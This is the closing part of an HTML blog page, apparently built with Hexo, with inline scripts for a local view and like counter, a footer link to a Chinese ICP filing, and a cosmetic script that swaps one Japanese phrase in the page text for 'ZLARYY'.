    button.setAttribute('aria-pressed', liked ? 'true' : 'false');
  }

  function bindLikeButton(box) {
    var button = box.querySelector('.post-like-btn');
    if (!button || button.dataset.bound === 'true') return;

    updateLikeButton(button, readLikeCount(), hasLiked());

    button.dataset.bound = 'true';
    button.addEventListener('click', function () {
      var count = readLikeCount();

      if (hasLiked()) {
        count = Math.max(0, count - 1);
        saveLikeState(count, false);
        updateLikeButton(button, count, false);
        return;
      }

      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      saveLikeState(count, true);
      updateLikeButton(button, count, true);
    });
  }

  function renderStats() {
    if (!isPostPage()) return;

    clearRewardNodes();

    var viewCount = bumpViewCount();
    var likeCount = readLikeCount();
    var liked = hasLiked();
    var box = document.querySelector(BOX_SELECTOR);

    if (!box) {
      var target = findInsertTarget();
      if (!target) return;

      box = createStatsBox(viewCount, likeCount, liked);
      target.parent.insertBefore(box, target.before);
    }

    var viewNode = box.querySelector('.local-view-count');
    var likeNode = box.querySelector('.local-like-count');
    var likeButton = box.querySelector('.post-like-btn');

    if (viewNode) viewNode.textContent = String(viewCount);
    if (likeNode) likeNode.textContent = String(likeCount);
    if (likeButton) {
      updateLikeButton(likeButton, likeCount, liked);
    }

    bindLikeButton(box);
  }

  function runPostStats() {
    window.setTimeout(renderStats, 0);
  }

  window[API_NAME] = {
    run: runPostStats
  };

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', runPostStats);
  } else {
    runPostStats();
  }

  document.addEventListener('pjax:complete', runPostStats);
})();
</script>
  
<script>
(function () {
  function addBeian() {
    const footerStatus = document.querySelector('#footer .status');
    if (!footerStatus) return;

    if (document.querySelector('.footer-beian')) return;

    const beian = document.createElement('div');
    beian.className = 'footer-beian';
    beian.innerHTML = '<a href="https://beian.miit.gov.cn/" target="_blank" rel="noopener">蜀ICP备2026016552号-1</a>';

    footerStatus.appendChild(beian);
  }

  addBeian();
  document.addEventListener('pjax:complete', addBeian);
})();
</script>
  <script>
(function () {
  function fixText(text) {
    if (!text) return text;
    text = text.replace(/\([`´]?Д[`´]?\)大変だ!/g, "ZLARYY");
    text = text.replace(/大変だ!/g, "ZLARYY");
    return text;
  }

  function replaceText(root) {
    root = root || document.body;
    if (!root) return;

    var walker = document.createTreeWalker(root, NodeFilter.SHOW_TEXT, null, false);
    var node;

    while ((node = walker.nextNode())) {
      var oldText = node.nodeValue;
      var newText = fixText(oldText);
      if (newText !== oldText) node.nodeValue = newText;
    }
  }

  function init() {
    replaceText(document.body);

    var observer = new MutationObserver(function (mutations) {
      mutations.forEach(function (mutation) {
        mutation.addedNodes.forEach(function (node) {
          if (node.nodeType === 1) {
            replaceText(node);
          } else if (node.nodeType === 3) {
            node.nodeValue = fixText(node.nodeValue);
          }
        });
      });
    });

    observer.observe(document.body, {
      childList: true,
      subtree: true
    });
  }

  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", init);
  } else {
    init();
  }
})();
</script><!-- hexo injector body_end end --></body></html>